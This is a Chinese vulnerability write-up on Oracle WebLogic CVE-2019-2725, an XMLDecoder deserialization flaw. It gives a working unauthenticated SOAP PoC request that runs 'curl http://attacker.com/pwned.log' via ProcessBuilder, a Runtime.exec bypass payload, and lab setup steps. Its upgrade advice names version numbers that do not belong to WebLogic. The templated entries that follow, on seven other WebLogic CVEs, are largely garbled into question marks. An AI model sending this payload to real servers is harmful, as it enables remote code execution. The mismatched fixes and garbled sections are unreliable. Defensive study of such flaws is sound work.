一、漏洞简介¶

1.1 漏洞背景¶

2019年4月，Oracle发布了针对CVE-2019-2725的紧急安全补丁。该漏洞是CVE-2017-10271的绕过补丁，利用WebLogic Server中的wls9-async和wls-wsat组件，通过HTTP协议进行反序列化攻击。

该漏洞被CISA列入已知被利用漏洞目录（KEV），表明该漏洞已在实际攻击中被广泛利用。由于其利用简单、无需认证、危害严重，被认为是2019年最危险的WebLogic漏洞之一。

1.2 漏洞概述（包含 CVE 编号、危害等级、漏洞类型、披露时间等）¶

• CVE编号：CVE-2019-2725
• 危害等级：严重（Critical）
• CVSS评分：9.8（CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H）
• 漏洞类型：XMLDecoder反序列化远程代码执行
• 攻击复杂度：低
• 权限要求：无需认证
• 用户交互：无需用户交互

补充核验信息：公开时间：2019-04-26；NVD 评分：9.8（CRITICAL）；CWE：CWE-74。

二、影响范围¶

2.1 受影响的版本¶

• Oracle WebLogic Server 10.3.6.0
• Oracle WebLogic Server 12.1.3.0

2.2 不受影响的版本¶

• Oracle WebLogic Server 10.3.6.0 + 2019年4月补丁及以上
• Oracle WebLogic Server 12.1.3.0 + 2019年4月补丁及以上
• Oracle WebLogic Server 12.2.1.0 及以上版本
• Oracle WebLogic Server 14.1.1.0 及以上版本

2.3 触发条件（如特定模块、特定配置、特定运行环境等）¶

1. 目标WebLogic Server开放HTTP服务端口（默认7001）
2. 目标WebLogic启用了wls9-async组件
3. 攻击者能够发送HTTP请求到目标服务器

三、漏洞详情与原理解析¶

3.1 漏洞触发机制¶

CVE-2019-2725利用了WebLogic Server中wls9-async响应服务组件，该组件使用XMLDecoder处理SOAP请求中的数据。攻击者可以通过构造恶意的SOAP请求，触发XMLDecoder反序列化漏洞，执行任意命令。

关键区别： - CVE-2017-10271利用wls-wsat组件 - CVE-2019-2725利用wls9-async组件（补丁绕过）

攻击路径：

HTTP请求 → /_async/AsyncResponseService → SOAP消息解析
→ XMLDecoder.readObject() → 执行XML中的任意Java代码

3.2 源码层面的根因分析（结合源码与补丁对比）¶

漏洞组件：wls9-async

// weblogic.wsee.async.AsyncResponseHandler
public class AsyncResponseHandler {

    public void handleAsyncResponse(SOAPMessage message) {
        try {
            // 获取SOAP Header
            SOAPHeader header = message.getSOAPHeader();

            // 解析WorkContext
            NodeList nodes = header.getElementsByTagNameNS(
                "http://bea.com/2004/06/soap/workarea/",
                "WorkContext"
            );

            for (int i = 0; i < nodes.getLength(); i++) {
                Node node = nodes.item(i);
                String xmlContent = node.getTextContent();

                // 使用XMLDecoder解析 - 漏洞点！
                XMLDecoder decoder = new XMLDecoder(
                    new ByteArrayInputStream(xmlContent.getBytes())
                );
                decoder.readObject();  // 执行恶意代码
                decoder.close();
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

补丁绕过分析：

Oracle针对CVE-2017-10271的补丁仅过滤了wls-wsat组件，但没有修复wls9-async组件中的相同问题：

// CVE-2017-10271补丁后的检查（仅在wls-wsat中）
public void validateWorkContext(String xmlContent) {
    // 黑名单过滤
    if (xmlContent.contains("ProcessBuilder") ||
        xmlContent.contains("Runtime")) {
        throw new SecurityException("Blocked!");
    }
}

// wls9-async组件没有此检查！

绕过补丁的payload格式：

<!-- 使用不同的编码和标签绕过简单过滤 -->
<java class="java.beans.XMLDecoder"
      string="<string>calc.exe</string>">
    <void class="java.lang.Runtime">
        <method name="getRuntime">
            <void method="exec">
                <string>calc.exe</string>
            </void>
        </method>
    </void>
</java>

触发端点：

/_async/AsyncResponseService
/_async/AsyncResponseServiceJms

四、漏洞复现（可选）¶

4.1 环境搭建¶

使用Docker环境：

# 使用vulhub环境
git clone https://github.com/vulhub/vulhub.git
cd vulhub/weblogic/CVE-2019-2725

# 启动WebLogic 10.3.6环境
docker-compose up -d

# 检查服务状态
docker-compose logs -f

检查组件是否存在：

# 验证wls9-async组件是否启用
curl -I http://localhost:7001/_async/AsyncResponseService

# 预期响应：200 OK 或 500 Internal Server Error（表示存在）

4.2 PoC 演示与测试过程¶

基础PoC（执行命令）：

```http POST /_async/AsyncResponseService HTTP/1.1 Host: 192.168.1.100:7001 Accept: / User-Agent: Apache-HttpClient/4.1.1 (java 1.5) Connection: keep-alive Content-Type: text/xml Content-Length: 850

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java class="java.beans.XMLDecoder"> <object class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://attacker.com/pwned.log</string> </void> </array> <void method="start"/> </object> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body> <asy:onAsyncDelivery/> </soapenv:Body> </soapenv:Envelope>

五、修复建议与缓解措施¶

5.1 官方版本升级建议¶

• 优先升级到 5.2.36 或同等后续安全版本。
• 优先升级到 6.0.16 或同等后续安全版本。
• 优先升级到 6.1.2 或同等后续安全版本。
• 升级前请结合官方发布说明确认兼容性与回滚方案。

5.2 临时缓解方案（如修改配置文件、关闭相关模块、增加 WAF 规则等）¶

• 在完成版本升级前，建议将相关服务限制在可信网络边界内，并最小化暴露面。
• 对高风险接口、插件或调试功能实施临时下线、访问控制与日志监控。

六、参考信息 / 参考链接¶

6.1 官方安全通告¶

• http://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html
• http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
• https://www.oracle.com/security-alerts/alert-cve-2019-2725.html#AppendixFMW
• https://www.oracle.com/security-alerts/cpujan2020.html
• https://github.com/vulhub/vulhub.git

6.2 其他技术参考资料¶

• NVD：https://nvd.nist.gov/vuln/detail/CVE-2019-2725
• CVE：https://www.cve.org/CVERecord?id=CVE-2019-2725
• http://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html
• http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
• https://www.oracle.com/security-alerts/alert-cve-2019-2725.html#AppendixFMW
• https://www.oracle.com/security-alerts/cpujan2020.html
• http://packetstormsecurity.com/files/152756/Oracle-Weblogic-Server-Deserialization-Remote-Code-Execution.html
• http://bea.com/2004/06/soap/workarea/"

Oracle WebLogic Server Oracle WebLogic Server OS Command Injection Vulnerability?CVE-2017-3506?¶

??????¶

1.1 ????¶

Oracle WebLogic Server ???????????? CVE-2017-3506 ??????????? 2026-03-22 ?????????????? HIGH?CVSS 7.4???? CISA KEV ?????

1.2 ??????? CVE ???????????????????¶

??????¶

2.1 ??????¶

• oracle:weblogic_server:10.3.6.0.0
• oracle:weblogic_server:12.1.3.0.0
• oracle:weblogic_server:12.2.1.0.0
• oracle:weblogic_server:12.2.1.1.0
• oracle:weblogic_server:12.2.1.2.0

2.2 ???????¶

• NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

• ?????????????????????????????????????????

???????????¶

3.1 ??????¶

• NVD ?????Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise O...
• ?????? CISA KEV ?????????????????????????????

3.2 ????????????????????¶

• ?????????????NVD-CWE-noinfo?CWE-78?
• NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

• ??????????????????????????????????????????

4.2 PoC ???????¶

• ? CISA KEV ????????????????? KEV ????? PoC?
• ??????????????????????????????????????????

???????????¶

5.1 ????????¶

• ???????????????????????????
• ??????????????????????????????????????

5.2 ????????????????????????????¶

• ??????????????????????
• ???????????????????????? WAF ???
• ????????????????????????????

?????? / ????¶

• https://nvd.nist.gov/vuln/detail/CVE-2017-3506
• https://www.cve.org/CVERecord?id=CVE-2017-3506
• https://www.cisa.gov/known-exploited-vulnerabilities-catalog
• http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html
• http://www.securityfocus.com/bid/97884
• http://www.securitytracker.com/id/1038296
• https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2017-3506

Oracle WebLogic Server Oracle WebLogic Server Unspecified Vulnerability?CVE-2018-2628?¶

??????¶

1.1 ????¶

Oracle WebLogic Server ???????????? CVE-2018-2628 ??????????? 2026-03-22 ?????????????? CRITICAL?CVSS 9.8???? CISA KEV ?????

1.2 ??????? CVE ???????????????????¶

??????¶

2.1 ??????¶

• oracle:weblogic_server:10.3.6.0.0
• oracle:weblogic_server:12.1.3.0.0
• oracle:weblogic_server:12.2.1.2.0
• oracle:weblogic_server:12.2.1.3

2.2 ???????¶

• NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

• ?????????????????????????????????????????

???????????¶

3.1 ??????¶

• NVD ?????Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle W...
• ?????? CISA KEV ?????????????????????????????

3.2 ????????????????????¶

• ?????????????CWE-502?
• NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

• ??????????????????????????????????????????

4.2 PoC ???????¶

• ? CISA KEV ????????????????? KEV ????? PoC?
• ??????????????????????????????????????????

???????????¶

5.1 ????????¶

• ???????????????????????????
• ??????????????????????????????????????

5.2 ????????????????????????????¶

• ??????????????????????
• ???????????????????????? WAF ???
• ????????????????????????????

?????? / ????¶

• https://nvd.nist.gov/vuln/detail/CVE-2018-2628
• https://www.cve.org/CVERecord?id=CVE-2018-2628
• https://www.cisa.gov/known-exploited-vulnerabilities-catalog
• http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
• http://www.securityfocus.com/bid/103776
• http://www.securitytracker.com/id/1040696
• https://github.com/brianwrf/CVE-2018-2628
• https://www.exploit-db.com/exploits/44553/

Oracle WebLogic Server Oracle WebLogic Server Unspecified Vulnerability?CVE-2020-2883?¶

??????¶

1.1 ????¶

Oracle WebLogic Server ???????????? CVE-2020-2883 ??????????? 2026-03-22 ?????????????? CRITICAL?CVSS 9.8???? CISA KEV ?????

1.2 ??????? CVE ???????????????????¶

??????¶

2.1 ??????¶

• oracle:weblogic_server:10.3.6.0.0
• oracle:weblogic_server:12.1.3.0.0
• oracle:weblogic_server:12.2.1.3.0
• oracle:weblogic_server:12.2.1.4.0

2.2 ???????¶

• NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

• ?????????????????????????????????????????

???????????¶

3.1 ??????¶

• NVD ?????Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogi...
• ?????? CISA KEV ?????????????????????????????

3.2 ????????????????????¶

• ?????????????NVD-CWE-noinfo?
• NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

• ??????????????????????????????????????????

4.2 PoC ???????¶

• ? CISA KEV ????????????????? KEV ????? PoC?
• ??????????????????????????????????????????

???????????¶

5.1 ????????¶

• ???????????????????????????
• ??????????????????????????????????????

5.2 ????????????????????????????¶

• ??????????????????????
• ???????????????????????? WAF ???
• ????????????????????????????

?????? / ????¶

• https://nvd.nist.gov/vuln/detail/CVE-2020-2883
• https://www.cve.org/CVERecord?id=CVE-2020-2883
• https://www.cisa.gov/known-exploited-vulnerabilities-catalog
• http://packetstormsecurity.com/files/157950/WebLogic-Server-Deserialization-Remote-Code-Execution.html
• https://www.oracle.com/security-alerts/cpuapr2020.html
• https://www.zerodayinitiative.com/advisories/ZDI-20-504/
• https://www.zerodayinitiative.com/advisories/ZDI-20-570/

Oracle WebLogic Server Oracle WebLogic Server Remote Code Execution Vulnerability?CVE-2020-14644?¶

??????¶

1.1 ????¶

Oracle WebLogic Server ???????????? CVE-2020-14644 ??????????? 2026-03-22 ?????????????? CRITICAL?CVSS 9.8???? CISA KEV ?????

1.2 ??????? CVE ???????????????????¶

??????¶

2.1 ??????¶

• oracle:weblogic_server:12.2.1.3.0
• oracle:weblogic_server:12.2.1.4.0
• oracle:weblogic_server:14.1.1.0.0

2.2 ???????¶

• NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

• ?????????????????????????????????????????

???????????¶

3.1 ??????¶

• NVD ?????Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Su...
• ?????? CISA KEV ?????????????????????????????

3.2 ????????????????????¶

• ?????????????NVD-CWE-noinfo?
• NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

• ??????????????????????????????????????????

4.2 PoC ???????¶

• ? CISA KEV ????????????????? KEV ????? PoC?
• ??????????????????????????????????????????

???????????¶

5.1 ????????¶

• ???????????????????????????
• ??????????????????????????????????????

5.2 ????????????????????????????¶

• ??????????????????????
• ???????????????????????? WAF ???
• ????????????????????????????

?????? / ????¶

• https://nvd.nist.gov/vuln/detail/CVE-2020-14644
• https://www.cve.org/CVERecord?id=CVE-2020-14644
• https://www.cisa.gov/known-exploited-vulnerabilities-catalog
• https://www.oracle.com/security-alerts/cpujul2020.html
• https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-14644

Oracle WebLogic Server Oracle WebLogic Server Remote Code Execution Vulnerability?CVE-2020-14750?¶

??????¶

1.1 ????¶

Oracle WebLogic Server ???????????? CVE-2020-14750 ??????????? 2026-03-22 ?????????????? CRITICAL?CVSS 9.8???? CISA KEV ?????

1.2 ??????? CVE ???????????????????¶

??????¶

2.1 ??????¶

• oracle:weblogic_server:10.3.6.0.0
• oracle:weblogic_server:12.1.3.0.0
• oracle:weblogic_server:12.2.1.3.0
• oracle:weblogic_server:12.2.1.4.0
• oracle:weblogic_server:14.1.1.0.0

2.2 ???????¶

• NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

• ?????????????????????????????????????????

???????????¶

3.1 ??????¶

• NVD ?????Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Ora...
• ?????? CISA KEV ?????????????????????????????

3.2 ????????????????????¶

• ?????????????NVD-CWE-noinfo?
• NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

• ??????????????????????????????????????????

4.2 PoC ???????¶

• ? CISA KEV ????????????????? KEV ????? PoC?
• ??????????????????????????????????????????

???????????¶

5.1 ????????¶

• ???????????????????????????
• ??????????????????????????????????????

5.2 ????????????????????????????¶

• ??????????????????????
• ???????????????????????? WAF ???
• ????????????????????????????

?????? / ????¶

• https://nvd.nist.gov/vuln/detail/CVE-2020-14750
• https://www.cve.org/CVERecord?id=CVE-2020-14750
• https://www.cisa.gov/known-exploited-vulnerabilities-catalog
• http://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html
• https://www.oracle.com/security-alerts/alert-cve-2020-14750.html
• https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-14750

Oracle WebLogic Server Oracle WebLogic Server Remote Code Execution Vulnerability?CVE-2020-14882?¶

??????¶

1.1 ????¶

Oracle WebLogic Server ???????????? CVE-2020-14882 ??????????? 2026-03-22 ?????????????? CRITICAL?CVSS 9.8???? CISA KEV ?????

1.2 ??????? CVE ???????????????????¶

??????¶

2.1 ??????¶

• oracle:weblogic_server:10.3.6.0.0
• oracle:weblogic_server:12.1.3.0.0
• oracle:weblogic_server:12.2.1.3.0
• oracle:weblogic_server:12.2.1.4.0
• oracle:weblogic_server:14.1.1.0.0

2.2 ???????¶

• NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

• ?????????????????????????????????????????

???????????¶

3.1 ??????¶

• NVD ?????Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Ora...
• ?????? CISA KEV ?????????????????????????????

3.2 ????????????????????¶

• ?????????????NVD-CWE-Other?
• NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

• ??????????????????????????????????????????

4.2 PoC ???????¶

• ? CISA KEV ????????????????? KEV ????? PoC?
• ??????????????????????????????????????????

???????????¶

5.1 ????????¶

• ???????????????????????????
• ??????????????????????????????????????

5.2 ????????????????????????????¶

• ??????????????????????
• ???????????????????????? WAF ???
• ????????????????????????????

?????? / ????¶

• https://nvd.nist.gov/vuln/detail/CVE-2020-14882
• https://www.cve.org/CVERecord?id=CVE-2020-14882
• https://www.cisa.gov/known-exploited-vulnerabilities-catalog
• http://packetstormsecurity.com/files/159769/Oracle-WebLogic-Server-Remote-Code-Execution.html
• http://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html
• http://packetstormsecurity.com/files/161128/Oracle-WebLogic-Server-12.2.1.0-Remote-Code-Execution.html
• https://www.oracle.com/security-alerts/cpuoct2020.html

Oracle WebLogic Server Oracle WebLogic Server Unspecified Vulnerability?CVE-2020-14883?¶

??????¶

1.1 ????¶

Oracle WebLogic Server ???????????? CVE-2020-14883 ??????????? 2026-03-22 ?????????????? HIGH?CVSS 7.2???? CISA KEV ?????

1.2 ??????? CVE ???????????????????¶

??????¶

2.1 ??????¶

• oracle:weblogic_server:10.3.6.0.0
• oracle:weblogic_server:12.1.3.0.0
• oracle:weblogic_server:12.2.1.3.0
• oracle:weblogic_server:12.2.1.4.0
• oracle:weblogic_server:14.1.1.0.0

2.2 ???????¶

• NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

• ?????????????????????????????????????????

???????????¶

3.1 ??????¶

• NVD ?????Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Ora...
• ?????? CISA KEV ?????????????????????????????

3.2 ????????????????????¶

• ?????????????NVD-CWE-Other?
• NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

• ??????????????????????????????????????????

4.2 PoC ???????¶

• ? CISA KEV ????????????????? KEV ????? PoC?
• ??????????????????????????????????????????

???????????¶

5.1 ????????¶

• ???????????????????????????
• ??????????????????????????????????????

5.2 ????????????????????????????¶

• ??????????????????????
• ???????????????????????? WAF ???
• ????????????????????????????

?????? / ????¶

• https://nvd.nist.gov/vuln/detail/CVE-2020-14883
• https://www.cve.org/CVERecord?id=CVE-2020-14883
• https://www.cisa.gov/known-exploited-vulnerabilities-catalog
• http://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html
• https://www.oracle.com/security-alerts/cpuoct2020.html
• https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-14883

Oracle WebLogic Server Oracle WebLogic Server Unspecified Vulnerability?CVE-2023-21839?¶

??????¶

1.1 ????¶

Oracle WebLogic Server ???????????? CVE-2023-21839 ??????????? 2026-03-22 ?????????????? HIGH?CVSS 7.5???? CISA KEV ?????

1.2 ??????? CVE ???????????????????¶

??????¶

2.1 ??????¶

• oracle:weblogic_server:12.2.1.3.0
• oracle:weblogic_server:12.2.1.4.0
• oracle:weblogic_server:14.1.1.0.0

2.2 ???????¶

• NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

• ?????????????????????????????????????????

???????????¶

3.1 ??????¶

• NVD ?????Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Su...
• ?????? CISA KEV ?????????????????????????????

3.2 ????????????????????¶

• ?????????????CWE-502?CWE-306?
• NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

• ??????????????????????????????????????????

4.2 PoC ???????¶

• ? CISA KEV ????????????????? KEV ????? PoC?
• ??????????????????????????????????????????

???????????¶

5.1 ????????¶

• ???????????????????????????
• ??????????????????????????????????????

5.2 ????????????????????????????¶

• ??????????????????????
• ???????????????????????? WAF ???
• ????????????????????????????

?????? / ????¶

• https://nvd.nist.gov/vuln/detail/CVE-2023-21839
• https://www.cve.org/CVERecord?id=CVE-2023-21839
• https://www.cisa.gov/known-exploited-vulnerabilities-catalog
• http://packetstormsecurity.com/files/172882/Oracle-Weblogic-PreAuth-Remote-Command-Execution.html
• https://www.oracle.com/security-alerts/cpujan2023.html
• https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-21839